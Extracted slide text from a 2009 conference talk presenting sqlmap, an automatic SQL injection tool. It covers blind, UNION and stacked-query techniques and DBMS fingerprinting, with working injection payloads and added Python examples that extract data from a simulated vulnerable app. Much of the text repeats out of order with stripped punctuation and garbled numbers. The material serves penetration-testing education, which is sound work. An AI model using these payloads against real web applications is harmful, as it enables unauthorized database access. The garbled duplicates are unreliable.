Intercon III London – January 9 2009 41
Links and contacts
Homepage: http://sqlmap.sourceforge.net
Documentation:
http://sqlmap.sourceforge.net/dev/index.html
http://sqlmap.sourceforge.net/doc/README.pdf
Mailing lists:
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
https://lists.sourceforge.net/lists/listinfo/sqlmap-devel
Personal contacts:
E-mail / Jabber: bernardo.damele@gmail.com
Blog: http://bernardodamele.blogspot.com
Intercon III London – January 9 2009 42
References
OWASP Testing Guide – Open Web Application Security Project
Exploit of a Mom – xkcd
Deep Blind SQL Injection – Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability – Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework – H D Moore and the Metasploit development team
w3af – Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference – David Litchfield (NGS Software)
Advanced SQL Injection – Victor Chapela (Sm4rt Security Services)
Python difflib – Python Software Foundation
NULL (SQL) – Wikipedia
Agent oriented SQL abuse – Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection – Bernardo Damele A. G.
DBMS Fingerprint – Daniele Bellucci (OWASP Backend Security Project)
Intercon III London – January 9 2009 43
Questions?
Thanks for your attention.
Intercon III London – January 9 2009 7
sqlmap is an automatic SQL injection tool.
Developed in Python. Started in July 2006, initially by Daniele Bellucci, then I took over in December 2006.
Licensed under the terms of the GPLv2.
Detects and takes advantage of SQL injection vulnerabilities in web applications. The user can choose to:
Perform an extensive back-end DBMS fingerprint
Enumerate users, password hashes, privileges, databases, tables, columns and their datatypes
Dump entire or user's specified database tables' entries
Run custom SQL statements, and more
sqlmap
Intercon III London – January 9 2009 8
sqlmap key features:
Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server back-end DBMS software
Full support for three SQL injection techniques:
Inferential blind SQL injection
UNION query SQL injection
Stacked queries (multiple statements) support
Target acquisition from the user, by parsing WebScarab/Burp proxies' request log files, by Google dorking
Tests for injection flaws on GET and POST parameters, HTTP User-Agent header and Cookie values
sqlmap features (1/2)
Intercon III London – January 9 2009 9
More features:
Silent to verbose output messages
Granularity in the user's options
Support for concurrent HTTP requests (multi-threading)
Estimated time of arrival
Session save and resume
Options from command line and/or configuration file
Integration with Metasploit and w3af
File system read and write access and operating system command execution by providing your own queries, depending on the session user privileges and back-end DBMS
sqlmap features (2/2)
Intercon III London – January 9 2009 10
Real world
"Have you ever had a dream, Neo, that you were so sure was real? What if you were unable to wake from that dream? How would you know the difference between the dream world and the real world?" – Morpheus, The Matrix
Intercon III London – January 9 2009 11
In the real world web applications are often complex.
Usually the page content changes at each refresh.
They have inline counters, advertisement banners, clocks, etc.
The inferential blind SQL injection algorithm is based on the concept that the HTTP responses differ depending on the SQL query.
Dealing with advertisements (1/3)
Intercon III London – January 9 2009 12
Obstacle
If the page content does not depend only on the SQL statement and changes at each refresh, then the algorithm may not work.
Dealing with advertisements (2/3)
Intercon III London – January 9 2009 13
The Python difflib library helped to solve this problem: for each HTTP response, sqlmap calls a function that compares the returned page content with the untouched original page content.
It returns a measure of the page contents' similarity as a float in the range [0, 1], rounded to 3 decimal places.
It works also when the original page is stable but the page for the injected query with a valid condition (True) differs.
If the automatic comparison fails, the user can provide a string or a regular expression to match on both the original and True page contents, and to not match on False page contents.
Dealing with advertisements (3/3)
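An added example (not sqlmap's code) of the comparison described above: difflib's SequenceMatcher ratio between the untouched page and two later responses of the same template, whose ad banner, counter and clock change on every refresh, with the threshold decision and the user-supplied string or regular expression fallback. Pages and thresholds are constructed for this example.

```python
import difflib
import re

# Constructed pages (not captured from any site): one template with a
# rotating ad banner, a visitor counter and a clock, served with the user
# row (injected condition True) or without it (condition False).
TEMPLATE = (
    "<html><head><title>Example Corp. - user lookup</title></head><body>"
    "<div id='nav'><a href='/'>Home</a> | <a href='/users'>Users</a> | "
    "<a href='/contact'>Contact</a></div>"
    "<div id='ad'><img src='/ads/{ad}'></div>"
    "<p>Visitors today: {hits}</p>"
    "<p>Server time: {clock}</p>"
    "{row}"
    "<p>Copyright (c) Example Corp. All rights reserved.</p>"
    "</body></html>"
)
ROW = ("<table><tr><td>alice</td><td>alice@example.test</td>"
       "<td>admin</td></tr></table>")
ORIGINAL = TEMPLATE.format(ad="banner-17.gif", hits="10412", clock="15:02:11", row=ROW)
TRUE_PAGE = TEMPLATE.format(ad="banner-23.gif", hits="10413", clock="15:02:19", row=ROW)
FALSE_PAGE = TEMPLATE.format(ad="banner-08.gif", hits="10414", clock="15:02:27", row="")

# Assumed thresholds for this example: ratios in the gap between them are
# reported as undecidable rather than guessed.
UPPER = 0.98
LOWER = 0.96


def similarity(original, page):
    """difflib similarity ratio in [0, 1], rounded to three digits.

    autojunk is disabled: with it on, characters that are frequent in a
    page longer than 200 bytes (e.g. '<', '>') would be ignored.
    """
    sm = difflib.SequenceMatcher(None, original, page, autojunk=False)
    return round(sm.ratio(), 3)


def compare(original, page, string=None, regex=None):
    """Classify `page` against the untouched original page.

    Returns True (same content apart from the dynamic parts), False
    (content changed) or None (in the gap: the caller should fall back
    to a string or regular expression the user supplies).
    """
    if string is not None:          # user-supplied fallback: substring
        return string in page
    if regex is not None:           # user-supplied fallback: regex
        return re.search(regex, page) is not None
    ratio = similarity(original, page)
    if ratio > UPPER:
        return True
    if ratio < LOWER:
        return False
    return None


if __name__ == "__main__":
    for name, page in (("True page", TRUE_PAGE), ("False page", FALSE_PAGE)):
        print(name, similarity(ORIGINAL, page), compare(ORIGINAL, page))
    print("fallback:", compare(ORIGINAL, FALSE_PAGE, string="alice@example.test"))
```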
Intercon III London – January 9 2009 14
In the standard SQL language NULL is allowed as a value for a table column field.
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher than a certain ASCII table number; this causes the page content to be True or False.
The SQL statement used by sqlmap, depending on the back-end DBMS, is similar to:
ASCII(SUBSTR((SQL query), Nth SQL query output char, 1)) > Bisection algorithm number
To NULL or not to NULL (1/4)
Intercon III London – January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL.
To NULL or not to NULL (2/4)
Intercon III London – January 9 2009 16
A possible solution for this problem consists in modifying all the SQL query's columns explicitly:
Casting its output to be a string
Returning the value ' ' (space) if the casted value is still NULL
Example on MySQL 5.0. The SQL query to enumerate the column name's first entry is:
SELECT name FROM test.users LIMIT 0, 1
Casted SQL query:
SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users LIMIT 0, 1
To NULL or not to NULL (3/4)
Intercon III London – January 9 2009 17
The inferential blind SQL injected statement will then be:
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)), CHAR(32)) FROM test.users LIMIT 0, 1), Nth SQL query output character, 1)) > Bisection algorithm number
URL encoded:
ORD%28MID%28%28SELECT%20IFNULL%28CAST%28name%20AS%20CHAR%2810000%29%29%2C%20CHAR%2832%29%29%20FROM%20test.users%20LIMIT%200%2C%201%29%2C%201%2C%201%29%29%20%3E%2063
To NULL or not to NULL (4/4)
Intercon III London – January 9 2009 18
You have got an injection point.
The injection point is in a SQL statement as follows:
SELECT * FROM users WHERE id LIKE ((('$_GET[id]'))) LIMIT 0, 1
SQL payload (1/3)
Intercon III London – January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parentheses; the statement terminates with a LIMIT clause.
SQL payload (2/3)
Intercon III London – January 9 2009 20
In this example the SQL payload that sqlmap identifies is:
id=1'))) AND ((('RaNd' LIKE 'RaNd
In the inferential blind SQL injection algorithm it will be:
id=1'))) AND ORD(MID((SQL query), Nth SQL query output character, 1)) > Bisection algorithm number AND ((('RaNd' LIKE 'RaNd
In the UNION query SQL injection technique it will be:
id=1'))) UNION ALL SELECT NULL, Concatenated SQL query, NULL AND ((('RaNd' LIKE 'RaNd
SQL payload (3/3)
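An added example, not from the slides, that runs the inferential algorithm of the last slides end to end against an in-memory SQLite table standing in for the web application's database: the same LIKE-within-three-parentheses statement, the same prefix and postfix, a bisection over the ordinal value, and the NULL row that the IFNULL/CAST rewrite exists for. SQLite's UNICODE/SUBSTR stand in for MySQL's ORD/MID; the table and its rows are constructed.

```python
import sqlite3

# Constructed in-memory demo table (no real target): the second row has a
# NULL name, the case the casting of the previous slides exists for.
SEED_ROWS = [("1", "alice"), ("2", None), ("3", "bob")]


class VulnerableApp:
    """Stand-in for the web application of the slides: the id parameter is
    interpolated into the statement and a result page is shown only when
    the statement returns a row (True). That is the whole side channel."""

    STATEMENT = "SELECT * FROM users WHERE id LIKE ((('%s'))) LIMIT 0, 1"

    def __init__(self):
        self.con = sqlite3.connect(":memory:")
        self.con.execute("CREATE TABLE users (id TEXT, name TEXT)")
        self.con.executemany("INSERT INTO users VALUES (?, ?)", SEED_ROWS)
        self.requests = 0

    def page_is_true(self, param):
        self.requests += 1
        try:
            return self.con.execute(self.STATEMENT % param).fetchone() is not None
        except sqlite3.Error:
            return False


# Payload prefix and postfix for the LIKE-within-three-parentheses point.
PREFIX = "1'))) AND "
POSTFIX = " AND ((('RaNd' LIKE 'RaNd"


def condition(query, position, number):
    """'ordinal of the Nth output character > number', as one SQL condition.

    The slides use MySQL's ORD(MID(...)); this demo runs on SQLite, where
    the same thing is spelled UNICODE(SUBSTR(...)).
    """
    return "UNICODE(SUBSTR((%s), %d, 1)) > %d" % (query, position, number)


def extract(app, query, max_len=64):
    """Recover the (ASCII) output of `query` one character at a time by
    bisection over its ordinal value: 8 requests per character."""
    out = []
    for pos in range(1, max_len + 1):
        # No character at this position (end of output, or NULL output):
        # the comparison yields NULL, the page is False, and we stop.
        if not app.page_is_true(PREFIX + condition(query, pos, 0) + POSTFIX):
            break
        low, high = 0, 127          # invariant: low < ordinal <= high
        while high - low > 1:
            mid = (low + high) // 2
            if app.page_is_true(PREFIX + condition(query, pos, mid) + POSTFIX):
                low = mid
            else:
                high = mid
        out.append(chr(high))
    return "".join(out)


PLAIN = "SELECT name FROM users LIMIT %d, 1"
CASTED = "SELECT IFNULL(CAST(name AS TEXT), CHAR(32)) FROM users LIMIT %d, 1"

if __name__ == "__main__":
    app = VulnerableApp()
    print(repr(extract(app, PLAIN % 0)), app.requests, "requests")
    # NULL name: the plain query is indistinguishable from 'no output' ...
    print(repr(extract(app, PLAIN % 1)))
    # ... while the casted one yields the space that IFNULL substitutes.
    print(repr(extract(app, CASTED % 1)))
```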
Intercon III London – January 9 2009 21
First demo
"I did every demo possible to see if the things would do what they were promising they would do." – Doug Hall
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London – January 9 2009 28
Example on MySQL 4.1 to enumerate the list of databases.
The SQL query to inject is:
SELECT db FROM mysql.db
sqlmap identified the injection point as being a non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario).
The injection will be:
id=-1 UNION ALL SELECT NULL, CONCAT(CHAR(100,84,71,69,87,98), IFNULL(CAST(db AS CHAR(10000)), CHAR(32)), CHAR(65,83,118,81,81,116)), NULL FROM mysql.db LIMIT 0, 1 AND 6972=6972
Going partial UNION (3/3)
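An added example (written for this page, not sqlmap's code) that builds the concatenated column of the two injections above in both the PostgreSQL and the MySQL form, splits the delimited entry back out of the page content, and repeats the partial UNION request once per entry against a simulated page. The marker strings are the slides' own; the rows behind the simulated page are constructed.

```python
import re


def chr_expr(dbms, text):
    """Spell `text` with the DBMS character function, so that no quote
    character is needed in the payload."""
    codes = [ord(c) for c in text]
    if dbms == "postgresql":
        return "||".join("CHR(%d)" % c for c in codes)
    if dbms == "mysql":
        return "CHAR(%s)" % ",".join(str(c) for c in codes)
    raise ValueError("unsupported dbms: %s" % dbms)


def concatenated_query(dbms, columns, table, start, sep, end, offset=None):
    """Fold `columns` into one NULL-safe output column, wrapped in the start
    and end markers and separated by `sep`, as in the two injections above.
    With `offset`, the partial UNION form that returns a single entry."""
    if dbms == "postgresql":
        safe = ["COALESCE(CAST(%s AS CHARACTER(10000)), CHR(32))" % c for c in columns]
        glue = "||" + chr_expr(dbms, sep) + "||"
        expr = chr_expr(dbms, start) + "||" + glue.join(safe) + "||" + chr_expr(dbms, end)
        limit = " LIMIT 1 OFFSET %d"
    else:
        safe = ["IFNULL(CAST(%s AS CHAR(10000)), CHAR(32))" % c for c in columns]
        glue = ", " + chr_expr(dbms, sep) + ", "
        expr = "CONCAT(%s, %s, %s)" % (chr_expr(dbms, start), glue.join(safe), chr_expr(dbms, end))
        limit = " LIMIT %d, 1"
    query = "UNION ALL SELECT NULL, %s, NULL FROM %s" % (expr, table)
    if offset is not None:
        query += limit % offset
    return query


def parse_entry(page, start, sep, end):
    """Recover one entry's column values from the page that echoed the
    concatenated column; a single space stands for NULL (or a space)."""
    m = re.search(re.escape(start) + "(.*?)" + re.escape(end), page, re.S)
    if not m:
        return None
    return m.group(1).split(sep)


def dump_entries(fetch_page, dbms, columns, table, count, start, sep, end):
    """The loop of the previous slide: one request per entry, `count` times."""
    rows = []
    for n in range(count):
        query = concatenated_query(dbms, columns, table, start, sep, end, offset=n)
        values = parse_entry(fetch_page(query), start, sep, end)
        if values is None:
            break
        rows.append(values)
    return rows


def simulated_site(rows, start, sep, end):
    """Stand-in for the vulnerable page (constructed, no real target): it
    renders what the DBMS would return for the entry the LIMIT selects."""
    def fetch_page(query):
        m = re.search(r"LIMIT (\d+), 1$|LIMIT 1 OFFSET (\d+)$", query)
        n = int(m.group(1) or m.group(2))
        if n >= len(rows):
            return "<html><body>No results</body></html>"
        values = [" " if v is None else str(v) for v in rows[n]]
        return "<html><body><b>%s%s%s</b></body></html>" % (start, sep.join(values), end)
    return fetch_page


if __name__ == "__main__":
    print(concatenated_query("mysql", ["db"], "mysql.db", "dTGEWb", "hdzQyZ", "ASvQQt", offset=0))
    site = simulated_site([("postgres", "t", "t", "t"), ("app", "f", None, "f")],
                          "SrlGVt", "hdzQyZ", "KyPADf")
    print(dump_entries(site, "postgresql", ["usename", "usecreatedb", "usesuper", "usecatupd"],
                       "pg_user", 2, "SrlGVt", "hdzQyZ", "KyPADf"))
```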
Intercon III London – January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw.
There are a few well known techniques and a few over-looked techniques.
sqlmap implements up to four techniques; three of these are in use by other tools.
The user can force the back-end DBMS software value: no HTTP requests are sent to identify the software.
By default a basic DBMS fingerprint based on one or two techniques is done: only two HTTP requests are sent.
The user can choose to perform an extensive DBMS fingerprint based on four techniques: numerous (30+) HTTP requests are sent.
DBMS fingerprint (1/4)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 6
Basically the steps to go through are
Detection of a possible SQL injection flaw
SQL query syntax detection
Back-end database management system fingerprint
Depending on the session user privileges back-end DBMS and some possible security settings in place server-side a SQL injection issue leads on the DBMS server to
DBMS data unauthorized access
File system read and write access
Operating system command execution
How does it work
Intercon III London ndash January 9 2009 7
sqlmap is an automatic SQL injection tool
Developed in Python Started on July 2006 initially by Daniele Bellucci then I took over in December 2006
Licensed under the terms of GPLv2
Detects and take advantage of SQL injection vulnerabilities in web applications The user can choose to
Perform an extensive back-end DBMS fingerprint
Enumerate users password hashes privileges databases tables columns and their datatypes
Dump entire or users specified database tables entries
Run custom SQL statements and more
sqlmap
Intercon III London ndash January 9 2009 8
sqlmap key features
Full support for MySQL Oracle PostgreSQL and Microsoft SQL Server back-end DBMS software
Full support for three SQL injection techniques
Inferential blind SQL injection
UNION query SQL injection
Stacked queries (multiple statements) support
Target aquisition from user by parsing WebScarabBurp proxies requests log files by Google dorking
Tests for injection flaws on GET and POST parameters HTTP User-Agent header and Cookie values
sqlmap features (12)
Intercon III London ndash January 9 2009 9
More features
Silent to verbose output messages
Granularity in the users options
Support for concurrent HTTP requests (multi-threading)
Estimated time of arrival
Session save and resume
Options from command line andor configuration file
Integration with Metasploit and w3af
File system read and write access and operating system command execution by providing own queries depending on the session user privileges and back-end DBMS
sqlmap features (22)
Intercon III London ndash January 9 2009 10
Real world
Have you ever had a dream Neo that you were so sure was real What if you were unable to wake from
that dream How would you know the difference between the dream world and the real world
Morpheus The Matrix
Intercon III London ndash January 9 2009 11
In the real world web applications are often complex
Usually the page content changes at each refresh
They have inline counters advertisement banner clocks etc
Inferential blind SQL injection algorithm is based on the concept that the HTTP responses differ depending on the SQL query
Dealing with advertisements (13)
Intercon III London ndash January 9 2009 12
Obstacle
If the page content does not depend only on the SQL statement and changes at each refresh then the algorithm may not work
Dealing with advertisements (23)
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
More on fingerprint
Fingerprinting is a key step in penetration testing.
It is not only about back-end DBMS software.
There are techniques and tools to fingerprint the web server, the web application technology and their underlying system.
What about the back-end DBMS underlying system?
sqlmap can fingerprint them without making extra requests:
Web application server and web application technology, by parsing the HTTP response headers (Server, X-AspNet-Version, X-Powered-By, etc.): known technique.
